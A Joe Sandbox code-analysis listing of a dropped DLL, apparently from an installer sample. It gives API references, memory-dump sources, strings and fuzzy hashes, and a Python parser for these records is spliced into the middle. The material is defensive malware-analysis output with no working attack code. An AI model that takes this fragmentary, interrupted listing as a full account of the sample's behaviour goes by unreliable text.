                                • API String ID: 323602529-0
                                • Opcode ID: ec59613fa64440a54e8165f15403d919d4a60d274e4d17cab2a683bff61f6286
                                • Instruction ID: 1aeb143bf472dfed3c7dfea741b7420481416133e3073860bbfc9a8aa32ad439
                                • Opcode Fuzzy Hash: ec59613fa64440a54e8165f15403d919d4a60d274e4d17cab2a683bff61f6286
                                • Instruction Fuzzy Hash: 0A516971211B00DBE725CF25D885BD7BBF4BB04718F548A1CD5AA4BBA1DB30B549CB81
                                APIs
                                • GetLastError.KERNEL32(6CE76DD8,0000000C), ref: 6CE4EF52
                                • ExitThread.KERNEL32 ref: 6CE4EF59
                                Similarity
                                • API ID: ErrorExitLastThread
                                • String ID:
                                • API String ID: 1611280651-0
                                • Opcode ID: 6048c289a0ce4a32162ef875b5c696ecce71e6cb8053b83970a3df1e961444f1
                                • Instruction ID: 8a6a2b8291d6a3aed94543c176f1d48118068cb1858e99f1ba828fcff9eb7b22
                                • Opcode Fuzzy Hash: 6048c289a0ce4a32162ef875b5c696ecce71e6cb8053b83970a3df1e961444f1
                                • Instruction Fuzzy Hash: C9F0C2B1A00600AFDB05EBB0D809AAE7B74FF41218F34864EE00597B51CB365915CFA1
                                Similarity
                                • API ID: __wsopen_s
                                • String ID:
                                • API String ID: 3347428461-0
                                • Opcode ID: d4f005f1a1e29513219847f3439ab92a98e58241755f52a8479e13c5012fe74b
                                • Instruction ID: f9ef03d39b590b2c7248b367431f2b4ec075b02ca721fae20b527107486ae71d
                                • Opcode Fuzzy Hash: d4f005f1a1e29513219847f3439ab92a98e58241755f52a8479e13c5012fe74b
                                • Instruction Fuzzy Hash: EC113A72A0420EAFCB05DF59E945ADB7BF8EF49318F144059F805AB301D671ED21CBA4
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                • Instruction ID: cc78379e435eb7b14255a66a7895672a072199f518c8463f6423af0076887102
                                • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                • Instruction Fuzzy Hash: CA014472C11159BFCF41DFA98D009DE7FB5AF08314F244166FD64E2690E7318625DB91
                                APIs
                                • CreateFileW.KERNEL32(00000000,00000000,?,6CE64115,?,?,00000000,?,6CE64115,00000000,0000000C), ref: 6CE64474
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                 • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: 8f0723eb614becdbf821de1a43564b1c8a28372a7fa1e74cf880d2d1f265e4f3
                                • Instruction ID: 4d4741e6000ed7325748ac68d80008a4c95c31d394ef8905625220fbcc589376
                                • Opcode Fuzzy Hash: 8f0723eb614becdbf821de1a43564b1c8a28372a7fa1e74cf880d2d1f265e4f3
                                • Instruction Fuzzy Hash: 6FD06C3210014DBBDF028E84DC06EDA3BBAFB88714F014000BA1856020C732E861EB90
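The records in this listing follow a fixed shape (optional APIs and Strings blocks, a Memory Dump Source, the IDA plugin snapshot, then the Similarity fields), so they can be parsed into structured data and the call-site addresses rebased for lookup in the on-disk module. The Python below is an added example, not Joe Sandbox code, and it makes two labelled assumptions: the dotted fields of an .sdmp file name are read as process index, dump type, sequence, region base and Win32 PAGE_* protection (the remaining fields are left undecoded), and the module image base is taken from the snapshot name hcaresult_<proc>_<type>_<base>_..., because the per-record "Offset" value follows the dumped region (6CCC0000 here, 6CE78000 in the records below) while the snapshot base does not. The embedded sample is a transcription of the CreateFileW record above and the __EH_prolog record that follows it.

```python
"""Parse Joe Sandbox 'Code Analysis' function records and rebase call sites to RVAs.

Added example, not part of the Joe Sandbox report or tooling. Assumptions are
marked in comments: sdmp field meanings and the use of the IDA snapshot base.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Win32 memory protection constants (documented PAGE_* values).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

# Constructed sample: two records transcribed from the listing (CreateFileW, __EH_prolog).
SAMPLE = """
APIs
• CreateFileW.KERNEL32(00000000,00000000,?,6CE64115,?,?,00000000,?,6CE64115,00000000,0000000C), ref: 6CE64474
Memory Dump Source
• Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
• Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 8f0723eb614becdbf821de1a43564b1c8a28372a7fa1e74cf880d2d1f265e4f3
• Instruction ID: 4d4741e6000ed7325748ac68d80008a4c95c31d394ef8905625220fbcc589376
• Opcode Fuzzy Hash: 8f0723eb614becdbf821de1a43564b1c8a28372a7fa1e74cf880d2d1f265e4f3
• Instruction Fuzzy Hash: 6FD06C3210014DBBDF028E84DC06EDA3BBAFB88714F014000BA1856020C732E861EB90
APIs
• __EH_prolog.LIBCMT ref: 6CED84B1
  • Part of subcall function 6CED993B: __EH_prolog.LIBCMT ref: 6CED9940
Strings
Memory Dump Source
• Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
Similarity
• API ID: H_prolog
• String ID: 1$`)K$h)K
• API String ID: 3519838083-3935664338
• Opcode ID: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
• Instruction ID: 21e9fa93dea0f1779e6f7409a587775249cec193e3630985855f88cea9362afa
• Opcode Fuzzy Hash: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
• Instruction Fuzzy Hash: 14F28D30900258DFDB11CFA8C894BDDBBB5AF49308F354099E449AB781DB75AE86CF61
"""

API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w@$?]+)\.(?P<lib>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
SOURCE_RE = re.compile(r"Source File:\s*(?P<sdmp>\S+\.sdmp),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+)")
SNAPSHOT_RE = re.compile(r"Snapshot File:\s*hcaresult_(?P<proc>\d+)_(?P<type>\d+)_(?P<base>[0-9A-Fa-f]+)_")
SIM_RE = re.compile(
    r"•\s*(?P<key>API ID|String ID|API String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash):[ \t]*(?P<val>.*)$", re.M)


@dataclass
class ApiRef:
    name: str
    lib: str
    ref: int                  # call-site virtual address as dumped
    subcall: Optional[int]    # callee address for 'Part of subcall function' entries


@dataclass
class FunctionRecord:
    apis: List[ApiRef] = field(default_factory=list)
    dump: Dict[str, object] = field(default_factory=dict)
    region_offset: int = 0    # the record's 'Offset' value (varies per region)
    module_base: int = 0      # base from the IDA snapshot name (assumption: module image base)
    similarity: Dict[str, str] = field(default_factory=dict)


def parse_sdmp_name(name: str) -> Dict[str, object]:
    """Decode an .sdmp file name. Field meaning is an assumption, not documented here."""
    fields = name[:-len(".sdmp")].split(".")
    if len(fields) != 8:
        raise ValueError(f"unexpected sdmp name: {name}")
    protect = int(fields[4], 16)
    return {
        "process_index": int(fields[0]),
        "dump_type": int(fields[1]),
        "sequence": int(fields[2]),
        "region_base": int(fields[3], 16),
        "protect": protect,
        "protect_name": PAGE_PROTECT.get(protect, f"0x{protect:x}"),
    }


def rva(addr: int, module_base: int) -> int:
    """Relative virtual address of a dumped call site, for lookup in the on-disk PE."""
    if addr < module_base:
        raise ValueError(f"{addr:#x} lies below module base {module_base:#x}")
    return addr - module_base


def parse_records(text: str) -> List[FunctionRecord]:
    """One record per 'Instruction Fuzzy Hash' line; a trailing cut-off record is dropped."""
    chunks, cur = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        cur.append(line)
        if "Instruction Fuzzy Hash:" in line:
            chunks.append("\n".join(cur))
            cur = []
    records = []
    for chunk in chunks:
        rec = FunctionRecord()
        for m in API_RE.finditer(chunk):
            rec.apis.append(ApiRef(m["name"], m["lib"], int(m["ref"], 16),
                                   int(m["sub"], 16) if m["sub"] else None))
        src = SOURCE_RE.search(chunk)
        if src:
            rec.dump = parse_sdmp_name(src["sdmp"])
            rec.region_offset = int(src["off"], 16)
        snap = SNAPSHOT_RE.search(chunk)
        if snap:
            rec.module_base = int(snap["base"], 16)
        for m in SIM_RE.finditer(chunk):
            rec.similarity[m["key"]] = m["val"].strip()
        records.append(rec)
    return records


def call_sites(records: List[FunctionRecord]):
    """(api, lib, RVA) for each direct call site; subcall entries belong to the callee."""
    return [(a.name, a.lib, rva(a.ref, r.module_base))
            for r in records for a in r.apis if a.subcall is None]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for rec in recs:
        d = rec.dump
        print(f"region {d['region_base']:#x} {d['protect_name']} offset {rec.region_offset:#x} "
              f"base {rec.module_base:#x} api_id={rec.similarity.get('API ID')!r}")
    for name, lib, r in call_sites(recs):
        print(f"  {lib}!{name} at RVA {r:#x}")
```

Rebasing on the snapshot base puts the CreateFileW call at RVA 0x1A4474, which is the offset to look up in the dropped DLL once it is loaded at its own preferred base; the "Offset" field is kept separately because it changes with the region and would give a different number for the 6CE78000 records. The final, incomplete record in this listing (it ends on a Source File line) is discarded rather than parsed partially.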
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                 • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                • Instruction ID: 5539a01c11ab0488cad495e2e049ce8ef8588404d5b87c4f101624e3fb002c5c
                                • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                • Instruction Fuzzy Hash:
                                APIs
                                • __EH_prolog.LIBCMT ref: 6CED84B1
                                  • Part of subcall function 6CED993B: __EH_prolog.LIBCMT ref: 6CED9940
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: 1$`)K$h)K
                                • API String ID: 3519838083-3935664338
                                • Opcode ID: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                • Instruction ID: 21e9fa93dea0f1779e6f7409a587775249cec193e3630985855f88cea9362afa
                                • Opcode Fuzzy Hash: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                • Instruction Fuzzy Hash: 14F28D30900258DFDB11CFA8C894BDDBBB5AF49308F354099E449AB781DB75AE86CF61
                                APIs
                                • __EH_prolog.LIBCMT ref: 6CECAEF4
                                  • Part of subcall function 6CECE622: __EH_prolog.LIBCMT ref: 6CECE627
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: $h%K
                                • API String ID: 3519838083-1737110039
                                • Opcode ID: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                • Instruction ID: 4c7375a0e1ffc50cb41d9e2f2fd4e7b4e733541f7dbe72ca8f78107785c30abf
                                • Opcode Fuzzy Hash: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                • Instruction Fuzzy Hash: F8536A30E01258DFDB15CBA4CA94BEDBBB4AF09308F24409CD469A7791DB749E89CF52
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: $J
                                • API String ID: 3519838083-1755042146
                                • Opcode ID: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                                • Instruction ID: 38b9bbcf63fb0b35c41a6d4b4fdf6a53a39eff8e51852ef645bd421cf86b9e23
                                • Opcode Fuzzy Hash: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                                • Instruction Fuzzy Hash: E1E29B74A05289DFEB01CFA8C544BDDBBB4AF0630CF354099E855AB781CB74EA46CB61
                                APIs
                                • __EH_prolog.LIBCMT ref: 6CEA6CE5
                                  • Part of subcall function 6CE7CC2A: __EH_prolog.LIBCMT ref: 6CE7CC2F
                                  • Part of subcall function 6CE7E6A6: __EH_prolog.LIBCMT ref: 6CE7E6AB
                                  • Part of subcall function 6CEA6A0E: __EH_prolog.LIBCMT ref: 6CEA6A13
                                  • Part of subcall function 6CEA6837: __EH_prolog.LIBCMT ref: 6CEA683C
                                  • Part of subcall function 6CEAA143: __EH_prolog.LIBCMT ref: 6CEAA148
                                  • Part of subcall function 6CEAA143: ctype.LIBCPMT ref: 6CEAA16C
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog$ctype
                                • String ID:
                                • API String ID: 1039218491-3916222277
                                • Opcode ID: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                                • Instruction ID: 94ece5f09a3673d8e4715bdc62fe03490c1b2d848ab9626a8a43366fac8e6bf2
                                • Opcode Fuzzy Hash: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                                • Instruction Fuzzy Hash: 0C039C31805288EEDF25DFA4C990BDCBBB0AF15308F34409ED4496BB91DB345B8ACB61
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: 3J$`/J$`1J$p0J
                                • API String ID: 0-2826663437
                                • Opcode ID: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                                • Instruction ID: 8e29983f8b532b3d58c48aa52625ce837a980175130e804fa99c39cf946d0dea
                                • Opcode Fuzzy Hash: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                                • Instruction Fuzzy Hash: 8A41E872F10A601AF3488E7A8C855667FC3C7CA346B4AC23DD565C7AD9DABDC40782A4
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: W
                                • API String ID: 3519838083-655174618
                                • Opcode ID: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                                • Instruction ID: 0a98a8a40349da0c75bfe61c6e838bc4214b9c19bb931d3f3c27f189cb3e9325
                                • Opcode Fuzzy Hash: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                                • Instruction Fuzzy Hash: 74B28A70A05299DFDB00CFA8C584B9DBBB4AF49318F394099E845EB752C775ED42CB60
                                APIs
                                • __EH_prolog.LIBCMT ref: 6CEC489B
                                  • Part of subcall function 6CEC5FC9: __EH_prolog.LIBCMT ref: 6CEC5FCE
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: @ K
                                • API String ID: 3519838083-4216449128
                                • Opcode ID: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                                • Instruction ID: ce21c1305ced7dd29f77b33d6fdcd8db1c8f81ce0f435f1afe12e20084512c71
                                • Opcode Fuzzy Hash: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                                • Instruction Fuzzy Hash: B3D1D071F042148BEB14CFA4C680BEDB7B6BF94318F34812BE425A7B94DB749845CB56
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: x=J
                                • API String ID: 3519838083-1497497802
                                • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                • Instruction ID: 5f8e689015c5d539295db3edce00eccc512cfd7bd0f41f87e7e52890d9729f44
                                • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                • Instruction Fuzzy Hash: 2291BD32D112499ACF28DFA4D8949EDB7B2AF1631CF30806ED45177B60DB32594ACBB0
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: 9c3421dad5d14781272ec358f91f3a3ab5cfaafabcf0205709a2c9463218eeaf
                                • Instruction ID: 3ac7560f38000a983cdc89217340827b99145f8c3d443a24e1d1aff574253e5d
                                • Opcode Fuzzy Hash: 9c3421dad5d14781272ec358f91f3a3ab5cfaafabcf0205709a2c9463218eeaf
                                • Instruction Fuzzy Hash: 56B2993090475ACFDB21CF69C484B9EBBB1BF18388F24419DD49AABB91D770A985CF11
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: @4J$DsL
                                • API String ID: 0-2004129199
                                • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                • Instruction ID: fee59ff1521d55e02b29f65290fc615421672d628dbd39cdbca6f0c92cf75d5f
                                • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                • Instruction Fuzzy Hash: 432191376A49560BD74CCA28DC33EB92681E745305B88527EE94BCB7D1DF5C8800C648
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: a09d6e82890587311bf3c607534608c3e0df372b1a8eae7fe7b1a33e2057bb73
                                • Instruction ID: 0b2a6b7ab2ab94f085e9ef448a4ee082614750e509fa166f4fc3945e674e2066
                                • Opcode Fuzzy Hash: a09d6e82890587311bf3c607534608c3e0df372b1a8eae7fe7b1a33e2057bb73
                                • Instruction Fuzzy Hash: 4BF15D70A00249DFCB14CFA8C690BEDBBB1BF05318F24816ED4699B752D770A959CF52
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                • Opcode ID: b70bb84cdfed215badc6c0dc16625fe684c20b396c3ab56e614d7a8a82e34842
                                • Instruction ID: e35af456f24f51f2cd3eb2facd2e393c307ddc439c8902835191bf9cdc661ccd
                                • Opcode Fuzzy Hash: b70bb84cdfed215badc6c0dc16625fe684c20b396c3ab56e614d7a8a82e34842
                                • Instruction Fuzzy Hash: 8A324AB1A083058FC318CF56C48495AF7E2BFCC314F468A5DE98997355DB74AA09CF86
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                • Opcode ID: f76254a8391bbbc56ee5761849d9b464ca1ca2a3d131f1b477d5a7e0a80fcda2
                                • Instruction ID: a7a8376172fccc512ee88f2ff1e82c53608fc51d478769685a7c0883e5e83584
                                • Opcode Fuzzy Hash: f76254a8391bbbc56ee5761849d9b464ca1ca2a3d131f1b477d5a7e0a80fcda2
                                • Instruction Fuzzy Hash: FD12F6B29083158FC358DF4AD44045BF7E2BFC8714F1A8A6EF898A7311D770E9568B86
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: __aullrem
                                • String ID:
                                • API String ID: 3758378126-0
                                • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                • Instruction ID: a1133e21a621fe33684b843d038796e0e9a051c0f9b1c3277f6ad00bae3528f4
                                • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                • Instruction Fuzzy Hash: E851EC71A053859BD710CF5AC4C06DDFBF6EF79214F28C05EE8C897282D27A595AC760
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-3916222277
                                • Opcode ID: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                                • Instruction ID: 7a5d570077252da29d621120c75f838d71e8d808967388e1c9674f3136201fda
                                • Opcode Fuzzy Hash: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                                • Instruction Fuzzy Hash: 4302AD316493808BD725CF28C49079EBBF2EFC9308F244A2DE4E99B751D7759946CB82
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CE78000, based on PE: true
                                 • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
